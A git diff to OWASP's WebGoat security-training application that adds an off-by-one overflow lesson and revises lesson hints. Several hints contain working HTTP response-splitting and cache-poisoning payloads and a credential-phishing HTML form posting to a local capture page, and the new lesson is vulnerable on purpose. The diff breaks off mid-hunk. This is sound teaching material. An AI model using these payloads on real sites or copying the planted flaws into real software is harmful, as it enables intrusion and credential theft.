diff --git a/webgoat/src/main/java/org/owasp/webgoat/lessons/BufferOverflow.java b/webgoat/src/main/java/org/owasp/webgoat/lessons/BufferOverflow.java
deleted file mode 100644
index 8266e8855..000000000
--- a/webgoat/src/main/java/org/owasp/webgoat/lessons/BufferOverflow.java
+++ /dev/null
@@ -1,103 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.StringElement;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 2007 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at code.google.com, a repository for free software
- * projects.
- * 
- * For details, please see http://code.google.com/p/webgoat/
- * 
- * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created October 28, 2003
- */
-public class BufferOverflow extends LessonAdapter
-{
-
-	/**
-	 * Description of the Method
-	 * 
-	 * @param s
-	 *            Description of the Parameter
-	 * @return Description of the Return Value
-	 */
-	protected Element createContent(WebSession s)
-	{
-		// just to get the generic how to text.
-		return super.createContent(s);
-	}
-
-	/**
-	 * Gets the category attribute of the ForgotPassword object
-	 * 
-	 * @return The category value
-	 */
-	protected Category getDefaultCategory()
-	{
-
-		return Category.BUFFER_OVERFLOW;
-	}
-
-	/**
-	 * Gets the hints attribute of the HelloScreen object
-	 * 
-	 * @return The hints value
-	 */
-	public List<String> getHints(WebSession s)
-	{
-		List<String> hints = new ArrayList<String>();
-		hints.add("Lesson Hint 1");
-		hints.add("Lesson Hint 2");
-
-		return hints;
-	}
-
-	private final static Integer DEFAULT_RANKING = new Integer(15);
-
-	protected Integer getDefaultRanking()
-	{
-		return DEFAULT_RANKING;
-	}
-
-	/**
-	 * Gets the title attribute of the HelloScreen object
-	 * 
-	 * @return The title value
-	 */
-	public String getTitle()
-	{
-		return ("Buffer Overflow");
-	}
-
-	public Element getCredits()
-	{
-		return new StringElement("This screen created by: Your name could go here");
-	}
-}
diff --git a/webgoat/src/main/java/org/owasp/webgoat/lessons/CSRF.java b/webgoat/src/main/java/org/owasp/webgoat/lessons/CSRF.java
index eb246f25d..c30991295 100644
--- a/webgoat/src/main/java/org/owasp/webgoat/lessons/CSRF.java
+++ b/webgoat/src/main/java/org/owasp/webgoat/lessons/CSRF.java
@@ -92,7 +92,7 @@ public class CSRF extends LessonAdapter
 			String title = HtmlEncoder.encode(s.getParser().getRawParameter(TITLE, ""));
 			String message = s.getParser().getRawParameter(MESSAGE, "");
 
-			Connection connection = DatabaseUtilities.getConnection(s);
+			Connection connection = DatabaseUtilities.getConnection(getNameroot(s.getUserName()),s.getWebgoatContext());
 
 			String query = "INSERT INTO messages VALUES (?, ?, ?, ?, ? )";
 
@@ -221,7 +221,7 @@ public class CSRF extends LessonAdapter
 
 		try
 		{
-			Connection connection = DatabaseUtilities.getConnection(s);
+			Connection connection = DatabaseUtilities.getConnection(getNameroot(s.getUserName()),s.getWebgoatContext());
 
 			// edit by Chuck Willis - Added logic to associate similar usernames
 			// The idea is that users chuck-1, chuck-2, etc will see each other's messages
@@ -280,7 +280,7 @@ public class CSRF extends LessonAdapter
 		{
 			int messageNum = s.getParser().getIntParameter(NUMBER, 0);
 
-			Connection connection = DatabaseUtilities.getConnection(s);
+			Connection connection = DatabaseUtilities.getConnection(getNameroot(s.getUserName()),s.getWebgoatContext());
 
 			String query = "SELECT * FROM messages WHERE user_name LIKE ? and num = ? and lesson_type = ?";
 			PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
diff --git a/webgoat/src/main/java/org/owasp/webgoat/lessons/Category.java b/webgoat/src/main/java/org/owasp/webgoat/lessons/Category.java
index 90b24335b..5683a4842 100644
--- a/webgoat/src/main/java/org/owasp/webgoat/lessons/Category.java
+++ b/webgoat/src/main/java/org/owasp/webgoat/lessons/Category.java
@@ -57,11 +57,11 @@ public class Category implements Comparable
 
 	public final static Category XSS = new Category("Cross-Site Scripting (XSS)", new Integer(900));
 
-	public final static Category DOS = new Category("Denial of Service", new Integer(1000));
+	public final static Category ERROR_HANDLING = new Category("Improper Error Handling", new Integer(1000));
 
-	public final static Category ERROR_HANDLING = new Category("Improper Error Handling", new Integer(1100));
-
-	public final static Category INJECTION = new Category("Injection Flaws", new Integer(1200));
+	public final static Category INJECTION = new Category("Injection Flaws", new Integer(1100));
+	
+	public final static Category DOS = new Category("Denial of Service", new Integer(1200));
 
 	public final static Category INSECURE_COMMUNICATION = new Category("Insecure Communication", new Integer(1300));
 
diff --git a/webgoat/src/main/java/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java b/webgoat/src/main/java/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java
index 530a74af1..4f45424e3 100644
--- a/webgoat/src/main/java/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java
+++ b/webgoat/src/main/java/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java
@@ -338,7 +338,7 @@ public class ClientSideFiltering extends SequentialLessonAdapter
 		hints.add("Stage 1: Look in the last row of the hidden table.");
 
 		hints
-				.add("Stage 1: You can access the server directly <a href = \"/WebGoat/lessons/Ajax/clientSideFiltering.jsp?userId=102\">here </a>"
+				.add("Stage 1: You can access the server directly <a href = \"/webgoat/lessons/Ajax/clientSideFiltering.jsp?userId=102\">here </a>"
 						+ "to see what results are being returned");
 
 		hints.add("Stage 2: The server uses an XPath query agasinst an XML database.");
@@ -346,7 +346,7 @@ public class ClientSideFiltering extends SequentialLessonAdapter
 		hints.add("Stage 2: The query currently returns all of the contents of the database.");
 
 		hints
-				.add("Stage 2: The query should only return the information of employees who are managed by Moe Stooge, who's userID is 102");
+				.add("Stage 2: The query should only return the information of employees who are managed by Moe Stooge, whose userID is 102");
 
 		hints.add("Stage 2: Try using a filter operator.");
 
diff --git a/webgoat/src/main/java/org/owasp/webgoat/lessons/DOMInjection.java b/webgoat/src/main/java/org/owasp/webgoat/lessons/DOMInjection.java
index aa589d1a0..8bf605fc0 100644
--- a/webgoat/src/main/java/org/owasp/webgoat/lessons/DOMInjection.java
+++ b/webgoat/src/main/java/org/owasp/webgoat/lessons/DOMInjection.java
@@ -74,7 +74,7 @@ public class DOMInjection extends LessonAdapter
 				s.getResponse().setHeader("Cache-Control", "no-cache");
 				PrintWriter out = new PrintWriter(s.getResponse().getOutputStream());
 
-				out.print("document.forms[0].SUBMIT.disabled = false;");
+				out.print("document.form.SUBMIT.disabled = false;");
 				out.flush();
 				out.close();
 				return;
@@ -182,7 +182,7 @@ public class DOMInjection extends LessonAdapter
 		List<String> hints = new ArrayList<String>();
 		hints.add("This page is using XMLHTTP to comunicate with the server.");
 		hints.add("Try to find a way to inject the DOM to enable the Activate button.");
-		hints.add("Intercept the reply and replace the body with document.forms[0].SUBMIT.disabled = false;");
+		hints.add("Intercept the reply and replace the body with document.form.SUBMIT.disabled = false;");
 		return hints;
 	}
 
diff --git a/webgoat/src/main/java/org/owasp/webgoat/lessons/DOMXSS.java b/webgoat/src/main/java/org/owasp/webgoat/lessons/DOMXSS.java
index 15bc94ed6..ffc576964 100644
--- a/webgoat/src/main/java/org/owasp/webgoat/lessons/DOMXSS.java
+++ b/webgoat/src/main/java/org/owasp/webgoat/lessons/DOMXSS.java
@@ -243,7 +243,7 @@ public class DOMXSS extends SequentialLessonAdapter
 
 		if (getLessonTracker(s).getStage() == 1)
 		{
-			instructions = "STAGE 1:\tFor this exercise, your mission is to deface this website using the image at the following location: <a href = '/WebGoat/images/logos/owasp.jpg'>OWASP IMAGE</a>";
+			instructions = "STAGE 1:\tFor this exercise, your mission is to deface this website using the image at the following location: <a href = '/webgoat/images/logos/owasp.jpg'>OWASP IMAGE</a>";
 		}
 		else if (getLessonTracker(s).getStage() == 2)
 		{
diff --git a/webgoat/src/main/java/org/owasp/webgoat/lessons/HttpSplitting.java b/webgoat/src/main/java/org/owasp/webgoat/lessons/HttpSplitting.java
index a8e34b60c..814386d8b 100644
--- a/webgoat/src/main/java/org/owasp/webgoat/lessons/HttpSplitting.java
+++ b/webgoat/src/main/java/org/owasp/webgoat/lessons/HttpSplitting.java
@@ -228,11 +228,11 @@ public class HttpSplitting extends SequentialLessonAdapter
 		hints.add("The Content-Length: 0 will tell the server that the first request is over.");
 		hints.add("A 200 OK message looks like this: HTTP/1.1 200 OK");
 		hints
-				.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM <br/> Try: language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a&lt;html&gt;Insert undesireable content here&lt;/html&gt;");
+				.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM <br/> Try: foobar%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0AContent-Length%3A%2047%0D%0A%0D%0A%3Chtml%3EHacked!%3C%2Fhtml%3E <br/>For insight into what this does, use the PHP charset encoder to decode it.");
 		hints
 				.add("Cache Poisoning starts with including 'Last-Modified' header in the hijacked page and setting it to a future date.");
 		hints
-				.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM <br/>Try language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202030%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a&lt;html&gt;Insert undesireable content here&lt;/html&gt;");
+				.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM <br/>Try foobar%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202080%2014%3A50%3A18%20GMT%0D%0AContent-Length%3A%2047%0D%0A%0D%0A%3Chtml%3EHacked%20J%3C%2Fhtml%3E");
 		hints
 				.add("'Last-Modified' header forces the browser to send a 'If-Modified-Since' header. Some cache servers will take the bait and keep serving the hijacked page");
 		hints
diff --git a/webgoat/src/main/java/org/owasp/webgoat/lessons/MaliciousFileExecution.java b/webgoat/src/main/java/org/owasp/webgoat/lessons/MaliciousFileExecution.java
index 299386c91..eceba3b91 100644
--- a/webgoat/src/main/java/org/owasp/webgoat/lessons/MaliciousFileExecution.java
+++ b/webgoat/src/main/java/org/owasp/webgoat/lessons/MaliciousFileExecution.java
@@ -361,7 +361,7 @@ public class MaliciousFileExecution extends LessonAdapter
 	String instructions = "The form below allows you to upload an image which will be displayed on this page.  " 
 		+ "Features like this are often found on web based discussion boards and social networking sites.  " 
 		+ "This feature is vulnerable to Malicious File Execution."
-		+ "<br><br>In order to pass this lession, upload and run a malicious file.  In order to prove that your file can execute,"
+		+ "<br><br>In order to pass this lesson, upload and run a malicious file.  In order to prove that your file can execute,"
 		+ " it should create another file named:<br><br> "
 		+ uploads_and_target_parent_directory
 		+ TARGET_RELATIVE_PATH 
diff --git a/webgoat/src/main/java/org/owasp/webgoat/lessons/OffByOne.java b/webgoat/src/main/java/org/owasp/webgoat/lessons/OffByOne.java
new file mode 100644
index 000000000..18834df8c
--- /dev/null
+++ b/webgoat/src/main/java/org/owasp/webgoat/lessons/OffByOne.java
@@ -0,0 +1,518 @@
+
+package org.owasp.webgoat.lessons;
+
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.apache.ecs.xhtml.br;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+
+
+/***************************************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ * 
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * @author Yiannis Pavlosoglou <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created December 05, 2009
+ */
+public class OffByOne extends LessonAdapter
+{
+	private final static String[] price_plans = { "$1.99 - 1 hour ", "$5.99 - 12 hours", "$9.99 - 24 hours"};
+	
+	private final static String ROOM_NUMBER = "room_no";
+
+	private final static String FIRST_NAME = "first_name";
+	
+	private final static String LAST_NAME = "last_name";	
+	
+	private final static String PRICE_PLAN = "price_plan";
+	
+	private final static IMG LOGO = new IMG("images/logos/seleucus.png").setAlt("Seleucus Ltd")
+	.setBorder(0).setHspace(0).setVspace(0);
+	
+	/**
+	 * <p>The main method for creating content, implemented
+	 * from the the LessonAdapter class.</p>
+	 * 
+	 * <p>This particular "Off-by-One" lesson belonging in 
+	 * the category of "Buffer Overflows" carries three 
+	 * steps.</p>
+	 * 
+	 * @param s
+	 *            WebSession
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
+
+		try
+		{
+			if(isFirstStep(s)) 
+			{
+				ec.addElement(makeFirstStep(s));
+			} 
+			else 
+			{
+				if (isSecondStep(s)) 
+				{
+					ec.addElement(makeSecondStep(s));
+				} 
+				else 
+				{
+					ec.addElement(makeThirdStep(s));
+				}
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+		
+		return (ec);
+	}
+
+	/**
+	 * <p>Returns the Buffer Overflow category for this
+	 * lesson.</p>
+	 * 
+	 * @return The category value
+	 */
+	protected Category getDefaultCategory()
+	{
+		return Category.BUFFER_OVERFLOW;
+	}
+
+	/**
+	 * <p>Returns the hints as a List of Strings
+	 * for this lesson.</p>
+	 * 
+	 * @return The hints values
+	 */
+	public List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("While registering for Internet usage, see where else your details are used during the registration process.");
+		hints.add("See which fields during the registration process, allow for really long input to be submitted.");
+		hints.add("Check for hidden form fields during registration");
+		hints.add("Typically, web-based buffer overflows occur just above the value of 2 to the power of a number. E.g. 1024 + 1, 2048 + 1, 4096 + 1");
+		return hints;
+	}
+
+	/**
+	 * <p>Get the default ranking within the "Buffer
+	 * Overflow" category.</p>
+	 * 
+	 * <p>Currently ranked to be the first lesson in
+	 * this category.</p>
+	 * 
+	 * @return The value of 5 as an Integer Object
+	 */
+	protected Integer getDefaultRanking()
+	{
+		return new Integer(5);
+	}
+
+	/**
+	 * <p>Gets the title attribute for this lesson.</p> 
+	 * 
+	 * @return "Off-by-One Overflows"
+	 */
+	public String getTitle()
+	{
+		return ("Off-by-One Overflows");
+	}
+
+	/**
+	 * yada, yada...
+	 */
+	public Element getCredits()
+	{
+		return super.getCustomCredits("Created by Yiannis Pavlosoglou ", LOGO);
+	}
+	
+	/**
+	 * <p>Based on the parameters currently with values, this method
+	 * returns true if we are in the first step of this lesson.</p>
+	 * 
+	 * @param s 
+	 * @return true if we are in the first step of the lesson.
+	 */
+	protected boolean isFirstStep(WebSession s) 
+	{
+		String room = s.getParser().getRawParameter(ROOM_NUMBER, "");
+		String name = s.getParser().getRawParameter(FIRST_NAME, "");
+		String last = s.getParser().getRawParameter(LAST_NAME, "");
+		
+		return (room.isEmpty() && name.isEmpty() && last.isEmpty() );
+	}
+	
+	/**
+	 * <p>Based on the parameters currently with values, this method
+	 * returns true if we are in the second step of this lesson.</p>
+	 * 
+	 * @param s
+	 * @return true if we are in the second step of the lesson
+	 */
+	protected boolean isSecondStep(WebSession s)
+	{
+		String price = s.getParser().getRawParameter(PRICE_PLAN, "");
+
+		return price.isEmpty();
+	}
+	
+	/**
+	 * <p>Method for constructing the first step and returning it as
+	 * an Element.</p>
+	 * 
+	 * @param s
+	 * @return The Element that is the first step.
+	 */
+	private Element makeFirstStep(WebSession s) 
+	{
+		ElementContainer ec = new ElementContainer();
+		String param = "";
+
+		// Header
+		ec.addElement(new StringElement("In order to access the Internet, you need to provide us the following information:"));
+		ec.addElement(new br());
+		ec.addElement(new br());
+		ec.addElement(new StringElement("Step 1/2"));
+		ec.addElement(new br());
+		ec.addElement(new br());
+		
+		ec.addElement(new StringElement("Ensure that your first and last names are entered exactly as they appear in the hotel's registration system."));
+		ec.addElement(new br());
+		ec.addElement(new br());
+
+		// Table 
+		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
+
+		if (s.isColor())
+		{
+			t.setBorder(1);
+		}
+		
+		// First Name
+		try {
+			param  = s.getParser().getStrictAlphaParameter(FIRST_NAME, 25);
+		} catch (ParameterNotFoundException e) {
+			param = "";
+		} catch (ValidationException e) {
+			param = "";
+		}
+		Input input = new Input(Input.TEXT, FIRST_NAME, param);
+
+		TR tr = new TR();
+		tr.addElement(new TD().addElement("First Name: "));
+		tr.addElement(new TD().addElement(input));
+		tr.addElement(new TD().addElement("*"));
+		t.addElement(tr);
+		tr = new TR();
+		tr.addElement(new TD().addElement("&nbsp;"));
+		tr.addElement(new TD().addElement("&nbsp;"));
+		tr.addElement(new TD().addElement("&nbsp;"));
+		t.addElement(tr);
+		
+		// Last Name
+		try {
+			param  = s.getParser().getStrictAlphaParameter(LAST_NAME, 25);
+		} catch (ParameterNotFoundException e) {
+			param = "";
+		} catch (ValidationException e) {
+			param = "";
+		}
+		input = new Input(Input.TEXT, LAST_NAME, param);
+
+		tr = new TR();
+		tr.addElement(new TD().addElement("Last Name: "));
+		tr.addElement(new TD().addElement(input));
+		tr.addElement(new TD().addElement("*"));
+		t.addElement(tr);
+		tr = new TR();
+		tr.addElement(new TD().addElement("&nbsp;"));
+		tr.addElement(new TD().addElement("&nbsp;"));
+		tr.addElement(new TD().addElement("&nbsp;"));
+		t.addElement(tr);
+		
+		// Room Number
+		try {
+			param  = s.getParser().getStrictAlphaParameter(ROOM_NUMBER, 25);
+		} catch (ParameterNotFoundException e) {
+			param = "";
+		} catch (ValidationException e) {
+			param = "";
+		}
+		input = new Input(Input.TEXT, ROOM_NUMBER, param);
+
+		tr = new TR();
+		tr.addElement(new TD().addElement("Room Number: "));
+		tr.addElement(new TD().addElement(input));
+		tr.addElement(new TD().addElement("*"));
+		t.addElement(tr);
+		tr = new TR();
+		tr.addElement(new TD().addElement("&nbsp;"));
+		tr.addElement(new TD().addElement("&nbsp;"));
+		tr.addElement(new TD().addElement("&nbsp;"));
+		t.addElement(tr);
+		
+		// Submit
+		tr = new TR();
+		tr.addElement(new TD().addElement("&nbsp;"));
+		tr.addElement(new TD().addElement(ECSFactory.makeButton("Submit")));
+		tr.addElement(new TD().addElement("&nbsp;"));
+		t.addElement(tr);
+		
+		ec.addElement(t);
+		
+		// Footer
+		ec.addElement(new br());
+		ec.addElement(new br());
+		ec.addElement(new StringElement("* The above fields are required for login."));
+		ec.addElement(new br());
+		ec.addElement(new br());
+		
+		
+		return ec;
+	}
+	
+	/**
+	 * <p>Method for constructing the second step and returning it as
+	 * an Element.</p>
+	 * 
+	 * @param s
+	 * @return The Element that is the second step.
+	 */
+	private Element makeSecondStep(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
+		String param = "";
+
+		// Header
+		ec.addElement(new StringElement("Please select from the following available price plans:"));
+		ec.addElement(new br());
+		ec.addElement(new br());
+		ec.addElement(new StringElement("Step 2/2"));
+		ec.addElement(new br());
+		ec.addElement(new br());
+		
+		ec.addElement(new StringElement("Ensure that your selection matches the hours of usage, as no refunds are given for this service."));
+		ec.addElement(new br());
+		ec.addElement(new br());
+
+		// Table
+		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
+
+		if (s.isColor())
+		{
+			t.setBorder(1);
+		}
+
+		
+		// First Empty Row
+		TR tr = new TR();
+		tr.addElement(new TD().addElement("&nbsp;"));
+		tr.addElement(new TD().addElement("&nbsp;"));
+		tr.addElement(new TD().addElement("&nbsp;"));
+		t.addElement(tr);
+		
+		// Price Plans
+		tr = new TR();
+		tr.addElement(new TD().addElement("Available Price Plans:"));
+		tr.addElement(new TD().addElement(ECSFactory.makePulldown(PRICE_PLAN, price_plans, price_plans[2], 1)));
+		tr.addElement(new TD().addElement("&nbsp;"));
+		t.addElement(tr);
+		
+		// Submit
+		tr = new TR();
+		tr.addElement(new TD().addElement("&nbsp;"));
+		tr.addElement(new TD().addElement(ECSFactory.makeButton("Accept Terms")));
+		tr.addElement(new TD().addElement("&nbsp;"));
+		t.addElement(tr);
+		
+		ec.addElement(t);
+		ec.addElement("\r\n");
+
+		// Hidden Form Fields
+		param = s.getParser().getStringParameter(LAST_NAME, "");
+		Input input = new Input(Input.HIDDEN, LAST_NAME, param);
+		ec.addElement(input);
+		ec.addElement("\r\n");
+
+		param = s.getParser().getStringParameter(FIRST_NAME, "");
+		input = new Input(Input.HIDDEN, FIRST_NAME, param);
+		ec.addElement(input);
+		ec.addElement("\r\n");
+
+		param = s.getParser().getStringParameter(ROOM_NUMBER, "");
+		input = new Input(Input.HIDDEN, ROOM_NUMBER, param);
+		ec.addElement(input);
+		ec.addElement("\r\n");
+
+		
+		// Footer
+		ec.addElement(new br());
+		ec.addElement(new br());
+		ec.addElement(new StringElement("By Clicking on the above you accept the terms and conditions."));
+		ec.addElement(new br());
+		ec.addElement(new br());
+		
+		
+		return ec;
+	}
+	
+	/**
+	 * <p>Method for constructing the third step and returning it as
+	 * an Element.</p>
+	 * 
+	 * @param s
+	 * @return The Element that is the third step.
+	 */
+	private Element makeThirdStep(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
+		String param = "";
+
+		// Header
+		ec.addElement(new StringElement("You have now completed the 2 step process and have access to the Internet"));
+		ec.addElement(new br());
+		ec.addElement(new br());
+		ec.addElement(new StringElement("Process complete"));
+		ec.addElement(new br());
+		ec.addElement(new br());
+		
+		ec.addElement(new StringElement("Your connection will remain active for the time allocated for starting now."));
+		ec.addElement(new br());
+		ec.addElement(new br());
+
+		// Table
+		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
+
+		if (s.isColor())
+		{
+			t.setBorder(1);
+		}
+
+		
+		// First Empty Row
+		TR tr = new TR();
+		tr.addElement(new TD().addElement("&nbsp;"));
+		tr.addElement(new TD().addElement("&nbsp;"));
+		tr.addElement(new TD().addElement("&nbsp;"));
+		t.addElement(tr);
+		
+		// Price Plans
+		tr = new TR();
+		tr.addElement(new TD().addElement("&nbsp;"));
+		tr.addElement(new TD().addElement("&nbsp;"));
+		tr.addElement(new TD().addElement("&nbsp;"));
+		t.addElement(tr);
+		
+		// Submit
+		tr = new TR();
+		tr.addElement(new TD().addElement("&nbsp;"));
+		tr.addElement(new TD().addElement("&nbsp;"));
+		tr.addElement(new TD().addElement("&nbsp;"));
+		t.addElement(tr);
+		
+		ec.addElement(t);
+		ec.addElement("\r\n");
+
+		// Hidden Form Fields
+		param = s.getParser().getStringParameter(LAST_NAME, "");
+		Input input = new Input(Input.HIDDEN, "a", param);
+		ec.addElement(input);
+		ec.addElement("\r\n");
+
+		param = s.getParser().getStringParameter(FIRST_NAME, "");
+		input = new Input(Input.HIDDEN, "b", param);
+		ec.addElement(input);
+		ec.addElement("\r\n");
+
+		param = s.getParser().getStringParameter(ROOM_NUMBER, "");
+		input = new Input(Input.HIDDEN, "c", param);
+		ec.addElement(input);
+		ec.addElement("\r\n");
+
+		// And finally the check...
+		if(param.length() > 4096)
+		{
+			ec.addElement(new Input(Input.hidden, "d", "Johnathan"));
+			ec.addElement("\r\n");
+			ec.addElement(new Input(Input.hidden, "e", "Ravern"));
+			ec.addElement("\r\n");
+			ec.addElement(new Input(Input.hidden, "f", "4321"));
+			ec.addElement("\r\n");
+
+			ec.addElement(new Input(Input.hidden, "g", "John"));
+			ec.addElement("\r\n");
+			ec.addElement(new Input(Input.hidden, "h", "Smith"));
+			ec.addElement("\r\n");
+			ec.addElement(new Input(Input.hidden, "i", "56"));
+			ec.addElement("\r\n");
+
+			ec.addElement(new Input(Input.hidden, "j", "Ana"));
+			ec.addElement("\r\n");
+			ec.addElement(new Input(Input.hidden, "k", "Arneta"));
+			ec.addElement("\r\n");
+			ec.addElement(new Input(Input.hidden, "l", "78"));
+			ec.addElement("\r\n");
+			
+			ec.addElement(new Input(Input.hidden, "m", "Lewis"));
+			ec.addElement("\r\n");
+			ec.addElement(new Input(Input.hidden, "n", "Hamilton"));
+			ec.addElement("\r\n");
+			ec.addElement(new Input(Input.hidden, "o", "9901"));
+			ec.addElement("\r\n");
+			// :)
+			makeSuccess(s);
+
+		}
+		
+		// Footer
+		ec.addElement(new br());
+		ec.addElement(new br());
+		ec.addElement(new StringElement("We would like to thank you for your payment."));
+		ec.addElement(new br());
+		ec.addElement(new br());
+		
+		
+		return ec;
+	}
+		
+
+}
diff --git a/webgoat/src/main/java/org/owasp/webgoat/lessons/Phishing.java b/webgoat/src/main/java/org/owasp/webgoat/lessons/Phishing.java
index a9a81fb8c..ce37685d7 100644
--- a/webgoat/src/main/java/org/owasp/webgoat/lessons/Phishing.java
+++ b/webgoat/src/main/java/org/owasp/webgoat/lessons/Phishing.java
@@ -170,21 +170,21 @@ public class Phishing extends LessonAdapter
 				+ "Try to make the form look official.");
 		hints
 				.add("Try: <BR> "
-						+ "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
-						+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+						+ "&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+						+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
 						+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
 						+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
 		hints
 				.add("Add functionality that can post a request, a button might work<BR><BR>"
 						+ "After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>"
-						+ "http://localhost/WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
+						+ "http://localhost/webgoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
 		hints
 				.add("Try: <BR> "
 						+ "&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
 						+ "value=&quot;login&quot;&gt;"
-						+ "<BR><BR>Solution for this hint:<BR><BR>"
-						+ "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
-						+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+						+ "<BR><BR>In the whole script:<BR><BR>"
+						+ "&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+						+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
 						+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
 						+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
 						+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
@@ -192,49 +192,52 @@ public class Phishing extends LessonAdapter
 				.add("Make the button perform an action on submit, <BR>"
 						+ "adding an onclick=\"hack()\" might work<BR>"
 						+ "Don't forget to add the hack() javascript function"
-						+ "<BR><BR>Solution for this hint:<BR><BR>"
